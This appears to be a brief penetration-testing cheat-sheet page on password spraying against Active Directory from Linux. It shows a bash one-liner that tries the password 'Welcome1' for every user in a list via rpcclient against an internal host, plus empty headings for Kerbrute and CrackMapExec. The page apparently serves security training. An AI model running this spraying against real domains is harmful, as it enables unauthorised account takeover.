Internal Password Spraying - from Linux ACTIVE Directory

Using a Bash one-liner for the Attack

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Copy

Using Kerbrute for the Attack

Using CrackMapExec & Filtering Logon Failures

Local Admin Spraying with CrackMapExec

Local Admin Spraying with CrackMapExec

Reference

Last updated